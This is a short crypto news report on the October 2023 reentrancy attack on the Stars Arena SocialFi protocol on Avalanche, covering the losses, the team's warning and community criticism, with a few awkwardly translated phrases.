A SocialFi protocol on Avalanche (AVAX) is the target of the second attack in three consecutive days. It appears that the bad actors themselves could be exploiting a well-known vulnerability, while some commentators accuse the team of doing an inside job.
Stars Arena attacked once again, here’s how
Stars Arena, an overrated SocialFi protocol on the Avalanche (AVAX) blockchain, was attacked today, October 7, 2023, at approximately 6 am UTC. The aggregate losses from its liquidity ecosystem could exceed 274,000 AVAX or nearly $2.9 million in equivalent, said cryptocurrency security researcher PeckShield on X.
The Stars Arena team confirmed the fact of the “vulnerability” and asked all its users and Avalanche (AVAX) enthusiasts to avoid depositing money while an investigation is underway:
There has been a major security breach with the smart contract. We are actively checking the issue. DO NOT deposit any funds. Stay tuned for updates
The attacker abused the “re-entry bug” to maliciously adjust the price to be paid for a “share”, a kind of in-app currency. The attackers made it possible to buy a stock and then sell it at a dramatically increased price.
It is also worth noting that two days ago, shortly after its launch, Avalanche-based SocialFi was already mined for over $1 million. As U.Today previously reported, the attackers were able to redeem zero shares for “real” AVAX payments.
Both key figures of Avalanche (AVAX) and representatives of the Stars Arena team emphasized that thanks to the inefficiency of the gas, the attack was not that dangerous.
Community angry: “Reentry attack in 2023?”
However, as it happened amid the “SocialFi frenzy” sparked by the success of Friend.tech, the Stars Arena drama caused quite a stir in the Web3 community.
Many X commenters highlighted that “reentry” attacks are well-known malicious practices previously used for price manipulations in DeFi:
The reentry issue is an old and classic attack, it should be checked first, I don’t understand why SA falls into such a stupid mistake.
Additionally, other speakers blame the internal work team, as elements of the contract appear “vulnerable.” unnecessary them.
In 2022, this attack design resulted in a loss of $80 million after the Rari/Fei exploit, as U.Today reported. Additionally, the infamous 2016 DAO hack used this method to drain Ethereum (ETH) funds.
